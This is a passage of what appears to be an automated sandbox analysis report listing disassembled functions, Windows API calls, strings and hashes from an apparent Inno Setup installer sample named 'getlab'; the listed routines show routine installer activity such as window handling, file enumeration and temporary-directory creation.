                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                          • API String ID: 854858120-615399546
                                                                          • Opcode ID: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                                          • Instruction ID: 453c4c1e4331516b603b6bd36f4112f8bfb414d7ddeab97af99533fe31520792
                                                                          • Opcode Fuzzy Hash: 5266c0f0ad6ebbe9230572b3dbc1c9029306f1427952ad7447b96826cd76bb62
                                                                          • Instruction Fuzzy Hash: 7A516C34B0074D6BDB11EF95C852BEEBBB9AF44305F50407BB804B7293D7789A098B59
                                                                          Function 00423684 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                          • OemToCharA.USER32(?,?), ref: 00423754
                                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                                          • String ID: 2$MAINICON
                                                                          • API String ID: 3935243913-3181700818
                                                                          • Opcode ID: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                          • Instruction ID: 89b1690b288838b812280c83b83aa3621e89473e571b5a361368100100c68adf
                                                                          • Opcode Fuzzy Hash: 0a58a7a63c51e6fb41ef8ab53b8ad398b79f83c4c9e9ca8a59e3f0dc4f1d370f
                                                                          • Instruction Fuzzy Hash: BD31D570A042559ADB10EF69C8C57CA3BE89F14308F4441BAE844DB383D7BED988CB59
                                                                          Function 00494A14 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                                          • 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                                          Strings
                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494A52
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1435929781-222967699
                                                                          • Opcode ID: 2902dc2c583c5dec24c60d58c3a9fd6cff270746e0fce7babd2e3a3436007c92
                                                                          • Instruction ID: 4a1d9e00790e4e8279befe01d539e981fbc0a950f87c09723c3c89301347e02c
                                                                          • Opcode Fuzzy Hash: 2902dc2c583c5dec24c60d58c3a9fd6cff270746e0fce7babd2e3a3436007c92
                                                                          • Instruction Fuzzy Hash: FA015E76A44604AFDB14DBA9CC41E5EB7ECDB48704F610476B604E7281DA78AE008B6C
                                                                          Function 00418F30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F35
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F56
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00418F71
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F92
                                                                            • Part of subcall function 004230C0: 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                            • Part of subcall function 004230C0: EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                            • Part of subcall function 004230C0: 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                            • Part of subcall function 004230C0: 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                            • Part of subcall function 00423684: LoadIconA.USER32(00400000,MAINICON), ref: 00423714
                                                                            • Part of subcall function 00423684: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423741
                                                                            • Part of subcall function 00423684: OemToCharA.USER32(?,?), ref: 00423754
                                                                            • Part of subcall function 00423684: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FDE,00000000,?,?,?,00000001), ref: 00423794
                                                                            • Part of subcall function 0041F110: GetVersion.KERNEL32(?,00418FE8,00000000,?,?,?,00000001), ref: 0041F11E
                                                                            • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F13A
                                                                            • Part of subcall function 0041F110: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F146
                                                                            • Part of subcall function 0041F110: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FE8,00000000,?,?,?,00000001), ref: 0041F154
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F184
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1AD
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1C2
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1D7
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1EC
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F201
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F216
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F22B
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F240
                                                                            • Part of subcall function 0041F110: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F255
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A24620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                          • API String ID: 3864787166-2767913252
                                                                          • Opcode ID: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                          • Instruction ID: 27c32735182dabff7e1c09a1de9b3c03b849675df7244bb9ef6d39ac7a5e8d86
                                                                          • Opcode Fuzzy Hash: 4c8bc3a0940144427da5e0ba9ef3ea459de966ceaf526f98a3946975224fbc60
                                                                          • Instruction Fuzzy Hash: 7A11FC70A182409AD704FF66A94275A76E1DB6830CF40853FF448AB391DB39A9458BAF
                                                                          Function 00413634 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$Prop
                                                                          • String ID:
                                                                          • API String ID: 3887896539-0
                                                                          • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                          • Instruction ID: 2f0da8c2a639c8e1c6f1513ac1b217b7872104ca576cf6b7b6160f367be9faf8
                                                                          • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                          • Instruction Fuzzy Hash: 8C11B775100244BFEF00DF9DDC84EDA37A8EB19364F144666B958DB2A2D738D9908B68
                                                                          Function 00471F5C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 263fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 00472109
                                                                          • FindClose.KERNEL32(000000FF,00472134,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472127
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 0047222B
                                                                          • FindClose.KERNEL32(000000FF,00472256,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472249
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID: p%G
                                                                          • API String ID: 2066263336-2885399958
                                                                          • Opcode ID: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                                          • Instruction ID: c5c343863c2eea904beb919c2ff7085193d8c56025a8159f133c7515c1d415d1
                                                                          • Opcode Fuzzy Hash: 70dfab7f3f526ba4f6777ec764105aa0072f72fa14368740d0b3654a77d976e0
                                                                          • Instruction Fuzzy Hash: F4B12B3490424D9FCF11DFA5C981ADEBBB9FF49304F5081AAE908B3251D7789A46CF68
                                                                          Function 004556AC Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455843,?,00000000,00455883), ref: 00455789
                                                                          Strings
                                                                          • WININIT.INI, xrefs: 004557B8
                                                                          • PendingFileRenameOperations2, xrefs: 00455758
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045570C
                                                                          • PendingFileRenameOperations, xrefs: 00455728
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                          • API String ID: 47109696-2199428270
                                                                          • Opcode ID: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                                          • Instruction ID: 0b70bbd74ac5003506c3e48668489f2f7adcdad68ca58941e5d407b4478d915f
                                                                          • Opcode Fuzzy Hash: 106a8fd2afe71b0f41862bd94ec021df8a162f8b500a81dbf23ed0435e9c3f1c
                                                                          • Instruction Fuzzy Hash: 0C518430E006489FDB10EF61DC51AEEB7B9EF44305F50857BE804A7292DB78AE49CA58
                                                                          Function 0047C378 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C40B
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C414
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                          • API String ID: 1375471231-2952887711
                                                                          • Opcode ID: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                                          • Instruction ID: d537758c7117fefc82ee858029cb7c27e5ed8caa62090c64dc1ceeedb24f0412
                                                                          • Opcode Fuzzy Hash: 3853c7abe1a0bd338ee766f5a09477788eee4f2c95defc4397553f6378db80d7
                                                                          • Instruction Fuzzy Hash: A0411774A001099BCB01EFA5C892ADEB7B5EF44305F50857BE814B7392DB38AE058B6D
                                                                          Function 00423A7C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • EnumWindows.USER32(00423A14), ref: 00423AA0
                                                                          • GetWindow.USER32(?,00000003), ref: 00423AB5
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423AC4
                                                                          • SetWindowPos.USER32(00000000,TAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241A3,?,?,00423D6B), ref: 00423AFA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnumLongWindows
                                                                          • String ID: TAB
                                                                          • API String ID: 4191631535-3846439302
                                                                          • Opcode ID: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                          • Instruction ID: 44c8a23491b9c45dd34cf4bcc3c04de93252e86aee0086cff54aee2134896fd7
                                                                          • Opcode Fuzzy Hash: 19508b105e07bab33860b27abf9b752e23d544e284505d5f1a6339f97510727e
                                                                          • Instruction Fuzzy Hash: 7B112A70704610ABDB10DF28D985F5677E8EB08725F51026AF994EB2E3C378AD41CB59
                                                                          Function 0042DE3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE48
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFE3,00000000,0042DFFB,?,?,?,?,00000006,?,00000000,00496D69), ref: 0042DE63
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE69
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDeleteHandleModuleProc
                                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                                          • API String ID: 588496660-1846899949
                                                                          • Opcode ID: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                                          • Instruction ID: 9c024767392e34e1239b6ccdb0e78e824d69575b4a8d701ce7db5acd733af5c1
                                                                          • Opcode Fuzzy Hash: c05e7c3326c5169c07e68be8c9fbbd77449d19c2dd42617386e66743e2d73e3c
                                                                          • Instruction Fuzzy Hash: B2E06DF1B41B30AAD72426697C8AFA72728DB74365F618537B105AD1A183FC1C50CE9D
                                                                          Function 0046B930 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • PrepareToInstall failed: %s, xrefs: 0046BC8E
                                                                          • NextButtonClick, xrefs: 0046BA6C
                                                                          • Need to restart Windows? %s, xrefs: 0046BCB5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                          • API String ID: 0-2329492092
                                                                          • Opcode ID: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                                          • Instruction ID: ef605359146084d2a330ce9392c81193c54d44d6395a219c566c339d74a55226
                                                                          • Opcode Fuzzy Hash: c85eed945518d546ff95eb83013acbbea6e3c59c24d52283f76f7584732158fe
                                                                          • Instruction Fuzzy Hash: F6D12A34A04108DFCB10EF99D585AEE77F5EF49304F6444BAE400AB352D778AE81CB9A
                                                                          Function 00482648 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 224COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?,?,00000000,00482990), ref: 0048276C
                                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482801
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveChangeNotifyWindow
                                                                          • String ID: $Need to restart Windows? %s
                                                                          • API String ID: 1160245247-4200181552
                                                                          • Opcode ID: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                                          • Instruction ID: d92f6dc0c394a11860c555715cc1377d1ab7d31dc5c27e132739ea4afdffe6c1
                                                                          • Opcode Fuzzy Hash: 205c42aac985357c00af048fdaf18b998a02a4faeff7a2d0de879de7ff73840d
                                                                          • Instruction Fuzzy Hash: 5291A274A042049FDB10FB69D986BAD77F4AF55308F1084BBE8009B362D7B86D05CB5D
                                                                          Function 0046F8FC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                          • GetLastError.KERNEL32(00000000,0046FAF9,?,?,0049C1D0,00000000), ref: 0046F9D6
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FA50
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FA75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                          • String ID: Creating directory: %s
                                                                          • API String ID: 2451617938-483064649
                                                                          • Opcode ID: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                                          • Instruction ID: 2bd83b05653ced0f0f619092410e1b81403e7cd9e02354fb4b3544f6b0b1216d
                                                                          • Opcode Fuzzy Hash: d149bf9a4864bf308676d1666e2ddee2b554becc532c3436bbb106b5e5686cba
                                                                          • Instruction Fuzzy Hash: 0F512174E00248ABDB01DFE9D582BDEBBF5AF48304F50847AE844B7396D7785E088B59
                                                                          Function 00454DA8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E56
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F1C), ref: 00454EC0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
